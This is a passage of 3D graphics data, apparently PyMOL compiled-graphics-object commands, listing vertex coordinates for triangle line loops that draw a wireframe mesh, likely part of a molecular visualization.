VERTEX, 20.737, 40.674, 29.892,
VERTEX, 21.111, 40.594, 29.792,
VERTEX, 20.707, 40.450, 29.931,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.111, 40.594, 29.792,
VERTEX, 20.707, 40.450, 29.931,
VERTEX, 21.096, 40.366, 29.809,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.707, 40.450, 29.931,
VERTEX, 21.096, 40.366, 29.809,
VERTEX, 20.648, 40.269, 29.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.096, 40.366, 29.809,
VERTEX, 20.648, 40.269, 29.802,
VERTEX, 21.037, 40.196, 29.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.648, 40.269, 29.802,
VERTEX, 21.037, 40.196, 29.666,
VERTEX, 20.594, 40.238, 29.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.037, 40.196, 29.666,
VERTEX, 20.594, 40.238, 29.581,
VERTEX, 20.970, 40.184, 29.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.594, 40.238, 29.581,
VERTEX, 20.970, 40.184, 29.447,
VERTEX, 20.577, 40.375, 29.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.970, 40.184, 29.447,
VERTEX, 20.577, 40.375, 29.397,
VERTEX, 20.934, 40.337, 29.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.577, 40.375, 29.397,
VERTEX, 20.934, 40.337, 29.280,
VERTEX, 20.607, 40.599, 29.358,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.934, 40.337, 29.280,
VERTEX, 20.607, 40.599, 29.358,
VERTEX, 20.949, 40.565, 29.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.607, 40.599, 29.358,
VERTEX, 20.949, 40.565, 29.263,
VERTEX, 20.666, 40.780, 29.487,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.949, 40.565, 29.263,
VERTEX, 20.666, 40.780, 29.487,
VERTEX, 21.007, 40.735, 29.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.666, 40.780, 29.487,
VERTEX, 21.007, 40.735, 29.405,
VERTEX, 20.720, 40.811, 29.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.007, 40.735, 29.405,
VERTEX, 20.720, 40.811, 29.708,
VERTEX, 21.075, 40.747, 29.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.720, 40.811, 29.708,
VERTEX, 21.075, 40.747, 29.625,
VERTEX, 20.737, 40.674, 29.892,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.075, 40.747, 29.625,
VERTEX, 20.737, 40.674, 29.892,
VERTEX, 21.111, 40.594, 29.792,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.111, 40.594, 29.792,
VERTEX, 21.434, 40.520, 29.656,
VERTEX, 21.096, 40.366, 29.809,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.434, 40.520, 29.656,
VERTEX, 21.096, 40.366, 29.809,
VERTEX, 21.425, 40.291, 29.655,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.096, 40.366, 29.809,
VERTEX, 21.425, 40.291, 29.655,
VERTEX, 21.037, 40.196, 29.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.425, 40.291, 29.655,
VERTEX, 21.037, 40.196, 29.666,
VERTEX, 21.367, 40.131, 29.500,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.037, 40.196, 29.666,
VERTEX, 21.367, 40.131, 29.500,
VERTEX, 20.970, 40.184, 29.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.367, 40.131, 29.500,
VERTEX, 20.970, 40.184, 29.447,
VERTEX, 21.294, 40.135, 29.283,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.970, 40.184, 29.447,
VERTEX, 21.294, 40.135, 29.283,
VERTEX, 20.934, 40.337, 29.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.294, 40.135, 29.283,
VERTEX, 20.934, 40.337, 29.280,
VERTEX, 21.249, 40.300, 29.129,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.934, 40.337, 29.280,
VERTEX, 21.249, 40.300, 29.129,
VERTEX, 20.949, 40.565, 29.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.249, 40.300, 29.129,
VERTEX, 20.949, 40.565, 29.263,
VERTEX, 21.258, 40.530, 29.130,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.949, 40.565, 29.263,
VERTEX, 21.258, 40.530, 29.130,
VERTEX, 21.007, 40.735, 29.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.258, 40.530, 29.130,
VERTEX, 21.007, 40.735, 29.405,
VERTEX, 21.316, 40.689, 29.285,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.007, 40.735, 29.405,
VERTEX, 21.316, 40.689, 29.285,
VERTEX, 21.075, 40.747, 29.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.316, 40.689, 29.285,
VERTEX, 21.075, 40.747, 29.625,
VERTEX, 21.389, 40.685, 29.503,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.075, 40.747, 29.625,
VERTEX, 21.389, 40.685, 29.503,
VERTEX, 21.111, 40.594, 29.792,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.389, 40.685, 29.503,
VERTEX, 21.111, 40.594, 29.792,
VERTEX, 21.434, 40.520, 29.656,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.434, 40.520, 29.656,
VERTEX, 21.716, 40.434, 29.497,
VERTEX, 21.425, 40.291, 29.655,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.716, 40.434, 29.497,
VERTEX, 21.425, 40.291, 29.655,
VERTEX, 21.702, 40.205, 29.482,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.425, 40.291, 29.655,
VERTEX, 21.702, 40.205, 29.482,
VERTEX, 21.367, 40.131, 29.500,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.702, 40.205, 29.482,
VERTEX, 21.367, 40.131, 29.500,
VERTEX, 21.643, 40.057, 29.317,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.367, 40.131, 29.500,
VERTEX, 21.643, 40.057, 29.317,
VERTEX, 21.294, 40.135, 29.283,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.643, 40.057, 29.317,
VERTEX, 21.294, 40.135, 29.283,
VERTEX, 21.575, 40.076, 29.099,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.294, 40.135, 29.283,
VERTEX, 21.575, 40.076, 29.099,
VERTEX, 21.249, 40.300, 29.129,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.575, 40.076, 29.099,
VERTEX, 21.249, 40.300, 29.129,
VERTEX, 21.537, 40.251, 28.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.249, 40.300, 29.129,
VERTEX, 21.537, 40.251, 28.955,
VERTEX, 21.258, 40.530, 29.130,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.537, 40.251, 28.955,
VERTEX, 21.258, 40.530, 29.130,
VERTEX, 21.551, 40.479, 28.970,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.258, 40.530, 29.130,
VERTEX, 21.551, 40.479, 28.970,
VERTEX, 21.316, 40.689, 29.285,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.551, 40.479, 28.970,
VERTEX, 21.316, 40.689, 29.285,
VERTEX, 21.609, 40.628, 29.135,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.316, 40.689, 29.285,
VERTEX, 21.609, 40.628, 29.135,
VERTEX, 21.389, 40.685, 29.503,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.609, 40.628, 29.135,
VERTEX, 21.389, 40.685, 29.503,
VERTEX, 21.678, 40.609, 29.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.389, 40.685, 29.503,
VERTEX, 21.678, 40.609, 29.354,
VERTEX, 21.434, 40.520, 29.656,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.678, 40.609, 29.354,
VERTEX, 21.434, 40.520, 29.656,
VERTEX, 21.716, 40.434, 29.497,
END,
COLOR, 0.000, 0.949, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 21.716, 40.434, 29.497,
VERTEX, 21.963, 40.320, 29.328,
VERTEX, 21.702, 40.205, 29.482,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.963, 40.320, 29.328,
VERTEX, 21.702, 40.205, 29.482,
VERTEX, 21.931, 40.094, 29.303,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.702, 40.205, 29.482,
VERTEX, 21.931, 40.094, 29.303,
VERTEX, 21.643, 40.057, 29.317,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.931, 40.094, 29.303,
VERTEX, 21.643, 40.057, 29.317,
VERTEX, 21.873, 39.957, 29.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.643, 40.057, 29.317,
VERTEX, 21.873, 39.957, 29.128,
VERTEX, 21.575, 40.076, 29.099,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.873, 39.957, 29.128,
VERTEX, 21.575, 40.076, 29.099,
VERTEX, 21.823, 39.990, 28.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.575, 40.076, 29.099,
VERTEX, 21.823, 39.990, 28.906,
VERTEX, 21.537, 40.251, 28.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.823, 39.990, 28.906,
VERTEX, 21.537, 40.251, 28.955,
VERTEX, 21.811, 40.172, 28.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.537, 40.251, 28.955,
VERTEX, 21.811, 40.172, 28.767,
VERTEX, 21.551, 40.479, 28.970,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.811, 40.172, 28.767,
VERTEX, 21.551, 40.479, 28.970,
VERTEX, 21.844, 40.398, 28.793,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.551, 40.479, 28.970,
VERTEX, 21.844, 40.398, 28.793,
VERTEX, 21.609, 40.628, 29.135,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.844, 40.398, 28.793,
VERTEX, 21.609, 40.628, 29.135,
VERTEX, 21.902, 40.535, 28.968,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.609, 40.628, 29.135,
VERTEX, 21.902, 40.535, 28.968,
VERTEX, 21.678, 40.609, 29.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.902, 40.535, 28.968,
VERTEX, 21.678, 40.609, 29.354,
VERTEX, 21.951, 40.502, 29.190,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.678, 40.609, 29.354,
VERTEX, 21.951, 40.502, 29.190,
VERTEX, 21.716, 40.434, 29.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.951, 40.502, 29.190,
VERTEX, 21.716, 40.434, 29.497,
VERTEX, 21.963, 40.320, 29.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.963, 40.320, 29.328,
VERTEX, 22.188, 40.163, 29.159,
VERTEX, 21.931, 40.094, 29.303,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.188, 40.163, 29.159,
VERTEX, 21.931, 40.094, 29.303,
VERTEX, 22.124, 39.945, 29.123,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.931, 40.094, 29.303,
VERTEX, 22.124, 39.945, 29.123,
VERTEX, 21.873, 39.957, 29.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.124, 39.945, 29.123,
VERTEX, 21.873, 39.957, 29.128,
VERTEX, 22.066, 39.822, 28.938,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.873, 39.957, 29.128,
VERTEX, 22.066, 39.822, 28.938,
VERTEX, 21.823, 39.990, 28.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.066, 39.822, 28.938,
VERTEX, 21.823, 39.990, 28.906,
VERTEX, 22.049, 39.864, 28.713,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.823, 39.990, 28.906,
VERTEX, 22.049, 39.864, 28.713,
VERTEX, 21.811, 40.172, 28.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.049, 39.864, 28.713,
VERTEX, 21.811, 40.172, 28.767,
VERTEX, 22.082, 40.048, 28.580,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.811, 40.172, 28.767,
VERTEX, 22.082, 40.048, 28.580,
VERTEX, 21.844, 40.398, 28.793,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.082, 40.048, 28.580,
VERTEX, 21.844, 40.398, 28.793,
VERTEX, 22.146, 40.265, 28.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.844, 40.398, 28.793,
VERTEX, 22.146, 40.265, 28.616,
VERTEX, 21.902, 40.535, 28.968,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.146, 40.265, 28.616,
VERTEX, 21.902, 40.535, 28.968,
VERTEX, 22.204, 40.389, 28.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.902, 40.535, 28.968,
VERTEX, 22.204, 40.389, 28.800,
VERTEX, 21.951, 40.502, 29.190,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.204, 40.389, 28.800,
VERTEX, 21.951, 40.502, 29.190,
VERTEX, 22.221, 40.347, 29.025,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.951, 40.502, 29.190,
VERTEX, 22.221, 40.347, 29.025,
VERTEX, 21.963, 40.320, 29.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.221, 40.347, 29.025,
VERTEX, 21.963, 40.320, 29.328,
VERTEX, 22.188, 40.163, 29.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.188, 40.163, 29.159,
VERTEX, 22.405, 39.949, 28.998,
VERTEX, 22.124, 39.945, 29.123,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.405, 39.949, 28.998,
VERTEX, 22.124, 39.945, 29.123,
VERTEX, 22.304, 39.749, 28.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.124, 39.945, 29.123,
VERTEX, 22.304, 39.749, 28.947,
VERTEX, 22.066, 39.822, 28.938,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.304, 39.749, 28.947,
VERTEX, 22.066, 39.822, 28.938,
VERTEX, 22.247, 39.641, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.066, 39.822, 28.938,
VERTEX, 22.247, 39.641, 28.752,
VERTEX, 22.049, 39.864, 28.713,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.247, 39.641, 28.752,
VERTEX, 22.049, 39.864, 28.713,
VERTEX, 22.270, 39.686, 28.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.049, 39.864, 28.713,
VERTEX, 22.270, 39.686, 28.528,
VERTEX, 22.082, 40.048, 28.580,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.270, 39.686, 28.528,
VERTEX, 22.082, 40.048, 28.580,
VERTEX, 22.357, 39.860, 28.406,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.082, 40.048, 28.580,
VERTEX, 22.357, 39.860, 28.406,
VERTEX, 22.146, 40.265, 28.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.357, 39.860, 28.406,
VERTEX, 22.146, 40.265, 28.616,
VERTEX, 22.459, 40.059, 28.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.146, 40.265, 28.616,
VERTEX, 22.459, 40.059, 28.457,
VERTEX, 22.204, 40.389, 28.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.459, 40.059, 28.457,
VERTEX, 22.204, 40.389, 28.800,
VERTEX, 22.515, 40.168, 28.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.204, 40.389, 28.800,
VERTEX, 22.515, 40.168, 28.651,
VERTEX, 22.221, 40.347, 29.025,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.515, 40.168, 28.651,
VERTEX, 22.221, 40.347, 29.025,
VERTEX, 22.492, 40.122, 28.875,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.221, 40.347, 29.025,
VERTEX, 22.492, 40.122, 28.875,
VERTEX, 22.188, 40.163, 29.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.492, 40.122, 28.875,
VERTEX, 22.188, 40.163, 29.159,
VERTEX, 22.405, 39.949, 28.998,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.405, 39.949, 28.998,
VERTEX, 22.632, 39.660, 28.855,
VERTEX, 22.304, 39.749, 28.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.632, 39.660, 28.855,
VERTEX, 22.304, 39.749, 28.947,
VERTEX, 22.499, 39.487, 28.784,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.304, 39.749, 28.947,
VERTEX, 22.499, 39.487, 28.784,
VERTEX, 22.247, 39.641, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.499, 39.487, 28.784,
VERTEX, 22.247, 39.641, 28.752,
VERTEX, 22.446, 39.396, 28.580,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.247, 39.641, 28.752,
VERTEX, 22.446, 39.396, 28.580,
VERTEX, 22.270, 39.686, 28.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.446, 39.396, 28.580,
VERTEX, 22.270, 39.686, 28.528,
VERTEX, 22.505, 39.440, 28.363,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.270, 39.686, 28.528,
VERTEX, 22.505, 39.440, 28.363,
VERTEX, 22.357, 39.860, 28.406,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.505, 39.440, 28.363,
VERTEX, 22.357, 39.860, 28.406,
VERTEX, 22.640, 39.594, 28.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.357, 39.860, 28.406,
VERTEX, 22.640, 39.594, 28.259,
VERTEX, 22.459, 40.059, 28.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.640, 39.594, 28.259,
VERTEX, 22.459, 40.059, 28.457,
VERTEX, 22.773, 39.768, 28.330,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.459, 40.059, 28.457,
VERTEX, 22.773, 39.768, 28.330,
VERTEX, 22.515, 40.168, 28.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.773, 39.768, 28.330,
VERTEX, 22.515, 40.168, 28.651,
VERTEX, 22.826, 39.859, 28.534,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.515, 40.168, 28.651,
VERTEX, 22.826, 39.859, 28.534,
VERTEX, 22.492, 40.122, 28.875,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.826, 39.859, 28.534,
VERTEX, 22.492, 40.122, 28.875,
VERTEX, 22.767, 39.814, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.492, 40.122, 28.875,
VERTEX, 22.767, 39.814, 28.752,
VERTEX, 22.405, 39.949, 28.998,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 39.814, 28.752,
VERTEX, 22.405, 39.949, 28.998,
VERTEX, 22.632, 39.660, 28.855,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.632, 39.660, 28.855,
VERTEX, 22.881, 39.279, 28.745,
VERTEX, 22.499, 39.487, 28.784,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.881, 39.279, 28.745,
VERTEX, 22.499, 39.487, 28.784,
VERTEX, 22.726, 39.138, 28.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.499, 39.487, 28.784,
VERTEX, 22.726, 39.138, 28.651,
VERTEX, 22.446, 39.396, 28.580,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.726, 39.138, 28.651,
VERTEX, 22.446, 39.396, 28.580,
VERTEX, 22.679, 39.068, 28.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.446, 39.396, 28.580,
VERTEX, 22.679, 39.068, 28.437,
VERTEX, 22.505, 39.440, 28.363,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.679, 39.068, 28.437,
VERTEX, 22.505, 39.440, 28.363,
VERTEX, 22.768, 39.109, 28.229,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.505, 39.440, 28.363,
VERTEX, 22.768, 39.109, 28.229,
VERTEX, 22.640, 39.594, 28.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.768, 39.109, 28.229,
VERTEX, 22.640, 39.594, 28.259,
VERTEX, 22.941, 39.237, 28.149,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.640, 39.594, 28.259,
VERTEX, 22.941, 39.237, 28.149,
VERTEX, 22.773, 39.768, 28.330,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.941, 39.237, 28.149,
VERTEX, 22.773, 39.768, 28.330,
VERTEX, 23.096, 39.378, 28.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.773, 39.768, 28.330,
VERTEX, 23.096, 39.378, 28.243,
VERTEX, 22.826, 39.859, 28.534,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.096, 39.378, 28.243,
VERTEX, 22.826, 39.859, 28.534,
VERTEX, 23.143, 39.448, 28.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.826, 39.859, 28.534,
VERTEX, 23.143, 39.448, 28.457,
VERTEX, 22.767, 39.814, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.143, 39.448, 28.457,
VERTEX, 22.767, 39.814, 28.752,
VERTEX, 23.054, 39.407, 28.665,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 39.814, 28.752,
VERTEX, 23.054, 39.407, 28.665,
VERTEX, 22.632, 39.660, 28.855,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.054, 39.407, 28.665,
VERTEX, 22.632, 39.660, 28.855,
VERTEX, 22.881, 39.279, 28.745,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.881, 39.279, 28.745,
VERTEX, 23.076, 38.853, 28.659,
VERTEX, 22.726, 39.138, 28.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.076, 38.853, 28.659,
VERTEX, 22.726, 39.138, 28.651,
VERTEX, 22.903, 38.757, 28.542,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.726, 39.138, 28.651,
VERTEX, 22.903, 38.757, 28.542,
VERTEX, 22.679, 39.068, 28.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.903, 38.757, 28.542,
VERTEX, 22.679, 39.068, 28.437,
VERTEX, 22.863, 38.708, 28.321,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.679, 39.068, 28.437,
VERTEX, 22.863, 38.708, 28.321,
VERTEX, 22.768, 39.109, 28.229,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.863, 38.708, 28.321,
VERTEX, 22.768, 39.109, 28.229,
VERTEX, 22.980, 38.735, 28.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.768, 39.109, 28.229,
VERTEX, 22.980, 38.735, 28.125,
VERTEX, 22.941, 39.237, 28.149,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.980, 38.735, 28.125,
VERTEX, 22.941, 39.237, 28.149,
VERTEX, 23.185, 38.822, 28.069,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.941, 39.237, 28.149,
VERTEX, 23.185, 38.822, 28.069,
VERTEX, 23.096, 39.378, 28.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.185, 38.822, 28.069,
VERTEX, 23.096, 39.378, 28.243,
VERTEX, 23.358, 38.917, 28.186,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.096, 39.378, 28.243,
VERTEX, 23.358, 38.917, 28.186,
VERTEX, 23.143, 39.448, 28.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.358, 38.917, 28.186,
VERTEX, 23.143, 39.448, 28.457,
VERTEX, 23.398, 38.966, 28.407,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.143, 39.448, 28.457,
VERTEX, 23.398, 38.966, 28.407,
VERTEX, 23.054, 39.407, 28.665,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.398, 38.966, 28.407,
VERTEX, 23.054, 39.407, 28.665,
VERTEX, 23.281, 38.939, 28.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.054, 39.407, 28.665,
VERTEX, 23.281, 38.939, 28.603,
VERTEX, 22.881, 39.279, 28.745,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.281, 38.939, 28.603,
VERTEX, 22.881, 39.279, 28.745,
VERTEX, 23.076, 38.853, 28.659,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.076, 38.853, 28.659,
VERTEX, 23.157, 38.436, 28.586,
VERTEX, 22.903, 38.757, 28.542,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.157, 38.436, 28.586,
VERTEX, 22.903, 38.757, 28.542,
VERTEX, 22.977, 38.390, 28.452,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.903, 38.757, 28.542,
VERTEX, 22.977, 38.390, 28.452,
VERTEX, 22.863, 38.708, 28.321,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.977, 38.390, 28.452,
VERTEX, 22.863, 38.708, 28.321,
VERTEX, 22.945, 38.360, 28.226,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.863, 38.708, 28.321,
VERTEX, 22.945, 38.360, 28.226,
VERTEX, 22.980, 38.735, 28.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.945, 38.360, 28.226,
VERTEX, 22.980, 38.735, 28.125,
VERTEX, 23.081, 38.364, 28.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.980, 38.735, 28.125,
VERTEX, 23.081, 38.364, 28.041,
VERTEX, 23.185, 38.822, 28.069,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.081, 38.364, 28.041,
VERTEX, 23.185, 38.822, 28.069,
VERTEX, 23.305, 38.399, 28.005,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.185, 38.822, 28.069,
VERTEX, 23.305, 38.399, 28.005,
VERTEX, 23.358, 38.917, 28.186,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.305, 38.399, 28.005,
VERTEX, 23.358, 38.917, 28.186,
VERTEX, 23.486, 38.445, 28.139,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.358, 38.917, 28.186,
VERTEX, 23.486, 38.445, 28.139,
VERTEX, 23.398, 38.966, 28.407,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.486, 38.445, 28.139,
VERTEX, 23.398, 38.966, 28.407,
VERTEX, 23.518, 38.475, 28.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.398, 38.966, 28.407,
VERTEX, 23.518, 38.475, 28.365,
VERTEX, 23.281, 38.939, 28.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.518, 38.475, 28.365,
VERTEX, 23.281, 38.939, 28.603,
VERTEX, 23.381, 38.471, 28.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.281, 38.939, 28.603,
VERTEX, 23.381, 38.471, 28.550,
VERTEX, 23.076, 38.853, 28.659,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.381, 38.471, 28.550,
VERTEX, 23.076, 38.853, 28.659,
VERTEX, 23.157, 38.436, 28.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.157, 38.436, 28.586,
VERTEX, 23.157, 38.022, 28.531,
VERTEX, 22.977, 38.390, 28.452,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.157, 38.022, 28.531,
VERTEX, 22.977, 38.390, 28.452,
VERTEX, 22.979, 38.018, 28.385,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.977, 38.390, 28.452,
VERTEX, 22.979, 38.018, 28.385,
VERTEX, 22.945, 38.360, 28.226,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.979, 38.018, 28.385,
VERTEX, 22.945, 38.360, 28.226,
VERTEX, 22.956, 38.005, 28.157,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.945, 38.360, 28.226,
VERTEX, 22.956, 38.005, 28.157,
VERTEX, 23.081, 38.364, 28.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.956, 38.005, 28.157,
VERTEX, 23.081, 38.364, 28.041,
VERTEX, 23.102, 37.990, 27.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.081, 38.364, 28.041,
VERTEX, 23.102, 37.990, 27.980,
VERTEX, 23.305, 38.399, 28.005,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.102, 37.990, 27.980,
VERTEX, 23.305, 38.399, 28.005,
VERTEX, 23.330, 37.983, 27.957,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.305, 38.399, 28.005,
VERTEX, 23.330, 37.983, 27.957,
VERTEX, 23.486, 38.445, 28.139,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.330, 37.983, 27.957,
VERTEX, 23.486, 38.445, 28.139,
VERTEX, 23.508, 37.987, 28.103,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.486, 38.445, 28.139,
VERTEX, 23.508, 37.987, 28.103,
VERTEX, 23.518, 38.475, 28.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.508, 37.987, 28.103,
VERTEX, 23.518, 38.475, 28.365,
VERTEX, 23.531, 38.000, 28.331,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.518, 38.475, 28.365,
VERTEX, 23.531, 38.000, 28.331,
VERTEX, 23.381, 38.471, 28.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.531, 38.000, 28.331,
VERTEX, 23.381, 38.471, 28.550,
VERTEX, 23.386, 38.015, 28.508,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.381, 38.471, 28.550,
VERTEX, 23.386, 38.015, 28.508,
VERTEX, 23.157, 38.436, 28.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.386, 38.015, 28.508,
VERTEX, 23.157, 38.436, 28.586,
VERTEX, 23.157, 38.022, 28.531,
END,
BEGIN, LINE_LOOP,
